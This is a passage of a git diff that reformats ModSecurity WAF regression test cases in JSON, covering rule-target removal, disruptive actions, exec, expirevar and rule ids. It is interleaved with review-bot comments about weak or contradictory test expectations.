ARGS_NAMES:pwd" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - 
"User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:pwd", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", - "SecRule ARGS_NAMES \"@contains pwd\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", + "SecRule ARGS_NAMES \"@contains pwd\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (3)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - 
"ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] } ] diff --git a/test/test-cases/regression/action-disruptive.json b/test/test-cases/regression/action-disruptive.json index da39b1c3bc..d345223c3f 100644 --- a/test/test-cases/regression/action-disruptive.json +++ b/test/test-cases/regression/action-disruptive.json 
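Review bot: In case (1) the rule under test carries both `pass` and `deny` (`id:1,phase:3,t:none,nolog,pass,tag:'CRS',deny`), so the expected `"http_code": 200` does not show which disruptive action the test depends on. If `pass` were the effective action, the 200 would hold even with the `ARGS:pwd` exclusion broken; dropping `pass` (`"id:1,phase:3,t:none,nolog,tag:'CRS',deny"`) makes the assertion meaningful either way. Since the title lines are rewritten here anyway, `CtlRuleRemoteTargetByTag` in all three titles could be corrected to `CtlRuleRemoveTargetByTag`.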
@@ -1,78 +1,234 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (1/n)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (1/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { "debug_log": "Running action deny", - "http_code":403 + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'900001',phase:request,nolog,status:403,t:none,block\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (2/n)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (2/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { "debug_log": "Running action deny", - "http_code":404 + "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,t:none,block\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (3/n)", - "expected":{ - "http_code":404 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (3/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction 
\"id:'1',phase:request,nolog,block,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (4/n)", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (4/n)", + "client": { + "ip": "", + "port": 0 }, - "rules":[ + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecAction \"id:'1',phase:request,nolog,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (5/n)", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (5/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] }, - "rules":[ + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,pass,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (6/n)", - "expected":{ - "http_code":403 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (6/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:'1',phase:request,drop,nolog,t:none\"" ] 
diff --git a/test/test-cases/regression/action-exec.json b/test/test-cases/regression/action-exec.json
index 80661114e0..5b5e6dcde3 100644
--- a/test/test-cases/regression/action-exec.json
+++ b/test/test-cases/regression/action-exec.json
@@ -1,148 +1,159 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (1/3)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + 
"" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"", - "parser_error":"exec: Expecting a Lua script: /bin/ech" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200, + "parser_error": "exec: Expecting a Lua script: /bin/ech" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,exec:/bin/echo\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (2/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + 
"Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + "" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Running script... test-cases/data/test.lua", - "error_log":"" + "expected": { + "debug_log": "Running script... test-cases/data/test.lua", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,exec:test-cases/data/test.lua\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (3/3)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + 
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + "" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Running script... test-cases/data/match.lua", - "error_log":"" + "expected": { + "debug_log": "Running script... test-cases/data/match.lua", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,exec:test-cases/data/match.lua\"" ] } ] - diff --git a/test/test-cases/regression/action-expirevar.json b/test/test-cases/regression/action-expirevar.json index 5c9d4ddfd4..3e2e9e6b72 100644 --- a/test/test-cases/regression/action-expirevar.json +++ b/test/test-cases/regression/action-expirevar.json 
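Review bot: Case (1/3) now expects `"http_code": 200` and a `debug_log` match together with `"parser_error": "exec: Expecting a Lua script: /bin/ech"`. A rule set that is rejected at parse time presumably never processes the request, so the status and log expectations are either unchecked or contradictory, depending on how the runner orders these checks (not visible in this hunk). This case is the one that pins `exec:` to Lua scripts rather than arbitrary binaries, so I would reduce its `expected` block to the `parser_error` alone; the same combination appears in action-id.json case (1/6). The second title reads `(2/2)` in a series of three and could become `(2/3)`.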
@@ -1,29 +1,41 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (1/x) - ip, expire later", - "expected":{ - "debug_log": "Saving msg: mycount1 is 100" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (1/x) - ip, expire later", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value", - "method":"GET" + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is 100", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"initcol:ip='127.0.0.1',id:5000,phase:1\"", "SecRule ARGS \"@rx value\" \"id:'5001',phase:2,setvar:ip.mycount1=100,expirevar:ip.mycount1=60,pass\"", 
@@ -31,30 +43,42 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (2/x) - ip, expire immediately", - "expected":{ - "debug_log": "Saving msg: mycount1 is " - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (2/x) - ip, expire immediately", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + }, - "uri":"/?key=value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"initcol:ip='127.0.0.1',id:5010,phase:1\"", "SecRule ARGS \"@rx value\" \"id:'5011',phase:2,setvar:ip.mycount1=100,expirevar:ip.mycount1=0,pass\"", 
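Review bot: The expected pattern `"Saving msg: mycount1 is "` in case (2/x) would also match `Saving msg: mycount1 is 100` if `debug_log` is matched as an unanchored pattern, which the `.*` expectations elsewhere in this patch suggest. In that case the test passes whether or not `expirevar:ip.mycount1=0` expired the variable, and the added `"http_code": 200` does not distinguish the two outcomes either. Tightening the pattern so that it cannot match a non-empty value would make the expiry observable; the exact form depends on what follows the message in the debug log line, which is not visible here. Case (4/x) in the hunk at `@@ -93,30 +129,42 @@` has the same issue with `"Saving msg: mycount1 is"`.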
@@ -62,30 +86,42 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (3/x) session, expire later", - "expected":{ - "debug_log": "Saving msg: mycount1 is 12" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (3/x) session, expire later", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value", - "method":"GET" + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is 12", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:5150,phase:2,pass,setsid:sess1234\"", "SecRule ARGS \"@rx value\" \"id:5151,phase:2,pass,setvar:session.mycount1=12,expirevar:session.mycount1=30\"", 
@@ -93,30 +129,42 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (4/x) session, expire immediately", - "expected":{ - "debug_log": "Saving msg: mycount1 is" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (4/x) session, expire immediately", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + }, - "uri":"/?key=value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:5150,phase:2,pass,setsid:sess1234\"", "SecRule ARGS \"@rx value\" \"id:5151,phase:2,pass,setvar:session.mycount1=12,expirevar:session.mycount1=0\"", diff --git a/test/test-cases/regression/action-id.json b/test/test-cases/regression/action-id.json index 9f9453c7e9..316228995f 100644 --- a/test/test-cases/regression/action-id.json +++ b/test/test-cases/regression/action-id.json 
@@ -1,264 +1,270 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (1/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (1/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "The input \"111111111111222222222222222222222222222333333333333333333333333333444444444444444444444444444444555555555555555555555555666666666666666666666666666666666666666666\" does not seems to be a valid rule id." 
}, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:111111111111222222222222222222222222222333333333333333333333333333444444444444444444444444444444555555555555555555555555666666666666666666666666666666666666666666,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (2/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (2/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "File: action-id.json. Line: 2. Column: 56. 
Expecting an action, got: id:-1,phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:-1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (3/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (3/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log": " t:trim: \"value2\"" + "expected": { + "debug_log": " t:trim: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:1,phase:3,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (4/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (4/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log": " t:trim: \"value2\"" + "expected": { + "debug_log": " t:trim: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:'1',phase:3,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (5/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (5/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "action-id.json. Line: 2. Column: 56. 
